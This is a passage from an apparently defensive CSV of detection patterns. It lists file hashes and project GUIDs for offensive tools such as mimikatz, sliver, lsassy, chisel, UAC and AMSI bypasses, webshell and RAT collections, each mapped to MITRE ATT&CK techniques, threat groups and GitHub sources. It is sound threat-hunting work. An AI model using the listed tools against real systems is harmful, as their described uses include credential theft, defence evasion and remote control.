"*36f45e69b0d6ce0325647dbe792399267ce73266f5cc72ca6f2bd845ba5513c9*",".{0,1000}36f45e69b0d6ce0325647dbe792399267ce73266f5cc72ca6f2bd845ba5513c9.{0,1000}","offensive_tool_keyword","PrivFu","enable or disable specific token privileges for a process","T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","SwitchPriv","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","24642"
"*36f8232a2d7766a7331b76c5edd8b43b9b53cf9b98575d0d010f4ed4a7e34dc1*",".{0,1000}36f8232a2d7766a7331b76c5edd8b43b9b53cf9b98575d0d010f4ed4a7e34dc1.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","24643"
"*36f88cb90ca8084fa93158aaee6b8879fb75ed8c3c12e946a32ffb7ef6023817*",".{0,1000}36f88cb90ca8084fa93158aaee6b8879fb75ed8c3c12e946a32ffb7ef6023817.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24644"
"*36F9C306-5F45-4946-A259-610C05BD90DF*",".{0,1000}36F9C306\-5F45\-4946\-A259\-610C05BD90DF.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","0","#GUIDproject","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","24645"
"*36fa3d212c2159c8e1b769bed63fd12c77cdff60f3d13e0b36a554d8e82d6f17*",".{0,1000}36fa3d212c2159c8e1b769bed63fd12c77cdff60f3d13e0b36a554d8e82d6f17.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24646"
"*36fc768852cf4e524b223b8cfc3d237b7cada43ad40f23ceb022f232a955616e*",".{0,1000}36fc768852cf4e524b223b8cfc3d237b7cada43ad40f23ceb022f232a955616e.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24647"
"*36ff05fc406bf6a2e677374028ba00cb622b2219e44c198d5dd6efae4ae963c3*",".{0,1000}36ff05fc406bf6a2e677374028ba00cb622b2219e44c198d5dd6efae4ae963c3.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","24648"
"*370058f9f12c7cc257de6508328287c7f6aa566003cecdaf843bdbbc4c0d177d*",".{0,1000}370058f9f12c7cc257de6508328287c7f6aa566003cecdaf843bdbbc4c0d177d.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","24649"
"*37029ec9cdb5036dfc1635ce9e69c358f39271bd6300a170e2b61d1d4ac3e526*",".{0,1000}37029ec9cdb5036dfc1635ce9e69c358f39271bd6300a170e2b61d1d4ac3e526.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24650"
"*37070edf6ebb0124be0a6c2d8b856ecc73a32149a3b0add1617e2280abbd236e*",".{0,1000}37070edf6ebb0124be0a6c2d8b856ecc73a32149a3b0add1617e2280abbd236e.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","24652"
"*370acf4cc5645e10b1633c5df10fd5331bef377ea731e3c97e05b5538b4266d5*",".{0,1000}370acf4cc5645e10b1633c5df10fd5331bef377ea731e3c97e05b5538b4266d5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24653"
"*370cdd5d3a9ee748014a2705e5a82960bef399121fb8f02cd37c47ed5dd7d326*",".{0,1000}370cdd5d3a9ee748014a2705e5a82960bef399121fb8f02cd37c47ed5dd7d326.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24654"
"*370d1dcdba848da3c77a39eef3ce5627005f8d762df8e26f8ae6b0bdd16b2323*",".{0,1000}370d1dcdba848da3c77a39eef3ce5627005f8d762df8e26f8ae6b0bdd16b2323.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","24655"
"*371226668baa95b330676a6268145ad25bfc28f59710f35fc1888aa6b70a74a4*",".{0,1000}371226668baa95b330676a6268145ad25bfc28f59710f35fc1888aa6b70a74a4.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","24656"
"*37124f470cc3c6c54010289c30833614a77f1864f7bf114291c65271f9fc2c4c*",".{0,1000}37124f470cc3c6c54010289c30833614a77f1864f7bf114291c65271f9fc2c4c.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","24657"
"*37189960f1e5e6efbc79bf55ef7ee6840cc639ce46905691f89850a950fbdd94*",".{0,1000}37189960f1e5e6efbc79bf55ef7ee6840cc639ce46905691f89850a950fbdd94.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","24658"
"*37203cc51ff33325e533e58de57884ecb9f28bea3b3e5fda2f0c98d1ce6d61e4*",".{0,1000}37203cc51ff33325e533e58de57884ecb9f28bea3b3e5fda2f0c98d1ce6d61e4.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24659"
"*372411e7c2512c38573da5590915f7f5bc401d3273e5a6bbbe5c0854d4267458*",".{0,1000}372411e7c2512c38573da5590915f7f5bc401d3273e5a6bbbe5c0854d4267458.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24661"
"*3727823313bffb3ba255f6bd4be4239a6b6816ead83aa024cec2459e4ef2cbf1*",".{0,1000}3727823313bffb3ba255f6bd4be4239a6b6816ead83aa024cec2459e4ef2cbf1.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24662"
"*3727f61b04be843ce0f423136f75180489433da44ad8dc9c948ca0008c7368eb*",".{0,1000}3727f61b04be843ce0f423136f75180489433da44ad8dc9c948ca0008c7368eb.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","24663"
"*37328d4092b0c2cf9e23443a1575078c0a072e0ca39382e27c8e9c177bad2048*",".{0,1000}37328d4092b0c2cf9e23443a1575078c0a072e0ca39382e27c8e9c177bad2048.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","24665"
"*374356feb445591acf371af512a66c6197f8a18613f41988cc7357b27c738a94*",".{0,1000}374356feb445591acf371af512a66c6197f8a18613f41988cc7357b27c738a94.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Discovery","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","0","#filehash","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","24667"
"*37447f986ad651df8ea39416f5d5289fda6d3d48155e7ae257c086f9a2478de0*",".{0,1000}37447f986ad651df8ea39416f5d5289fda6d3d48155e7ae257c086f9a2478de0.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#filehash","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","24668"
"*374a98a083fc04f30b86718a9fe7a5a61d1afc22b93222a89d2b752b5da1df7e*",".{0,1000}374a98a083fc04f30b86718a9fe7a5a61d1afc22b93222a89d2b752b5da1df7e.{0,1000}","offensive_tool_keyword","GrabChrome","HelloKitty Grabber used by Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","24669"
"*374cd6159d14dcfe12e51038c9ea6c5e954346963a705f6bd7ab2ce91b37ec61*",".{0,1000}374cd6159d14dcfe12e51038c9ea6c5e954346963a705f6bd7ab2ce91b37ec61.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24670"
"*375b4f81c0ce1ab360c6f369c4bb2765ba3d683aae1f33250bdd1d1a79f9d31d*",".{0,1000}375b4f81c0ce1ab360c6f369c4bb2765ba3d683aae1f33250bdd1d1a79f9d31d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","24671"
"*375D8508-F60D-4E24-9DF6-1E591D2FA474*",".{0,1000}375D8508\-F60D\-4E24\-9DF6\-1E591D2FA474.{0,1000}","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","0","#GUIDproject","N/A","10","1","97","22","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z","24672"
"*375f1c3e957ea3eea4956ae449e652962a57473ff55f193b8eabec033eeea187*",".{0,1000}375f1c3e957ea3eea4956ae449e652962a57473ff55f193b8eabec033eeea187.{0,1000}","offensive_tool_keyword","sshamble","SSHamble is a research tool for analyzing SSH implementations focusing on attacks against authentication - timing analysis and post-session enumeration.","T1021 - T1040 - T1592 - T1033","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/runZeroInc/sshamble","1","0","#filehash","N/A","10","10","946","74","2025-04-07T15:08:38Z","2024-07-27T20:32:10Z","24673"
"*37618f36a162e667eb98cb36bc1568524f87efc7cc12ef6d0ea4ef2f225c799d*",".{0,1000}37618f36a162e667eb98cb36bc1568524f87efc7cc12ef6d0ea4ef2f225c799d.{0,1000}","offensive_tool_keyword","SharpExShell","SharpExShell automates the DCOM lateral movment technique which abuses ActivateMicrosoftApp method of Excel application","T1021.003 - T1218.007 - T1127.001","TA0008 - TA0009 - TA0005","N/A","N/A","Lateral Movement","https://github.com/grayhatkiller/SharpExShell","1","0","#filehash","N/A","8","1","70","15","2024-05-01T23:17:25Z","2023-10-30T18:16:41Z","24674"
"*376713183026ccc822e9c1dead28cc81c7cfa7ad1c88e368ada6c31ce3909a2e*",".{0,1000}376713183026ccc822e9c1dead28cc81c7cfa7ad1c88e368ada6c31ce3909a2e.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","0","#filehash","N/A","10","10","1102","171","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z","24675"
"*376890088b7c004896fa764dc8148944e9dcee1017c481e246b892520f96aa6e*",".{0,1000}376890088b7c004896fa764dc8148944e9dcee1017c481e246b892520f96aa6e.{0,1000}","offensive_tool_keyword","GlobalUnProtect","Decrypt GlobalProtect configuration and cookie files.","T1552 - T1003 - T1555","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/rotarydrone/GlobalUnProtect","1","0","#filehash","N/A","9","2","147","19","2024-09-10T20:19:24Z","2024-09-04T15:31:52Z","24676"
"*3768f75f13bf1f58b77046be2174d666f05006a8a139cdca85bc5cd291a81fa8*",".{0,1000}3768f75f13bf1f58b77046be2174d666f05006a8a139cdca85bc5cd291a81fa8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24677"
"*376b60699e97c1214507bfcb1f20f426b2532a94e5594c12ea469454568f2c94*",".{0,1000}376b60699e97c1214507bfcb1f20f426b2532a94e5594c12ea469454568f2c94.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24678"
"*37706c5669d241ae392c5b3e412e7a6eefb5397723ea9d464a60c7ae7a8aa2aa*",".{0,1000}37706c5669d241ae392c5b3e412e7a6eefb5397723ea9d464a60c7ae7a8aa2aa.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24680"
"*37754362c1524cbecc907a1cde4a3c4e1c747235a140c2275e482724fca9955d*",".{0,1000}37754362c1524cbecc907a1cde4a3c4e1c747235a140c2275e482724fca9955d.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","24681"
"*3787435B-8352-4BD8-A1C6-E5A1B73921F4*",".{0,1000}3787435B\-8352\-4BD8\-A1C6\-E5A1B73921F4.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","24682"
"*3787435B-8352-4BD8-A1C6-E5A1B73921F4*",".{0,1000}3787435B\-8352\-4BD8\-A1C6\-E5A1B73921F4.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","#GUIDproject","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","24683"
"*378f6e87219651f96e607e40c229e5f17df4ad71836409881fe3cc77c6780ac7*",".{0,1000}378f6e87219651f96e607e40c229e5f17df4ad71836409881fe3cc77c6780ac7.{0,1000}","offensive_tool_keyword","SharpElevator","SharpElevator is a C# implementation of Elevator for UAC bypass","T1548.002 - T1548","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/SharpElevator","1","0","#filehash","N/A","10","1","51","12","2022-08-31T18:09:10Z","2022-08-29T19:52:53Z","24686"
"*378FC1AA-37BD-4C61-B5DE-4E45C2CDB8C9*",".{0,1000}378FC1AA\-37BD\-4C61\-B5DE\-4E45C2CDB8C9.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","24687"
"*3791fe80848940a320ef55ec49c9a23fffcb1b97977d0a6140df61efc6533829*",".{0,1000}3791fe80848940a320ef55ec49c9a23fffcb1b97977d0a6140df61efc6533829.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","#filehash","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","24688"
"*379331177374643353a85fea9cd5934f1207a0fc6bb2370b658090240263ccbd*",".{0,1000}379331177374643353a85fea9cd5934f1207a0fc6bb2370b658090240263ccbd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24689"
"*379F3514AA07B5A9783639932C3ABF48F68742FE4B65C4A94436632C2AB53AFC*",".{0,1000}379F3514AA07B5A9783639932C3ABF48F68742FE4B65C4A94436632C2AB53AFC.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","24690"
"*37a95e2ef3089da0c4c732b45cd9aee36b5a0a0709abf4dd1a739a24f8d08c61*",".{0,1000}37a95e2ef3089da0c4c732b45cd9aee36b5a0a0709abf4dd1a739a24f8d08c61.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","24691"
"*37aaa060ddae57e5457ffc47f65362682d64da54775c2211705b8a7becc9e657*",".{0,1000}37aaa060ddae57e5457ffc47f65362682d64da54775c2211705b8a7becc9e657.{0,1000}","offensive_tool_keyword","mimipenguin","A tool to dump the login password from the current linux user","T1003.007","TA0006 - TA0002 ","N/A","TeamTNT","Credential Access","https://github.com/huntergregal/mimipenguin","1","0","#filehash #linux","N/A","10","10","3940","644","2023-05-17T13:20:46Z","2017-03-28T21:24:28Z","24692"
"*37b26d324e903117759d48809761ae6e33bc10e4ce50fb06c4980fd42a4cea8a*",".{0,1000}37b26d324e903117759d48809761ae6e33bc10e4ce50fb06c4980fd42a4cea8a.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","24694"
"*37bfb3819257d612a6dfed9954c9ba4a8da62f6967ec8221c802d7eb97723113*",".{0,1000}37bfb3819257d612a6dfed9954c9ba4a8da62f6967ec8221c802d7eb97723113.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","24697"
"*37c719615f3d72d457564a3f2af7669fbea6d651b92de213699419a4e8ac27e9*",".{0,1000}37c719615f3d72d457564a3f2af7669fbea6d651b92de213699419a4e8ac27e9.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - 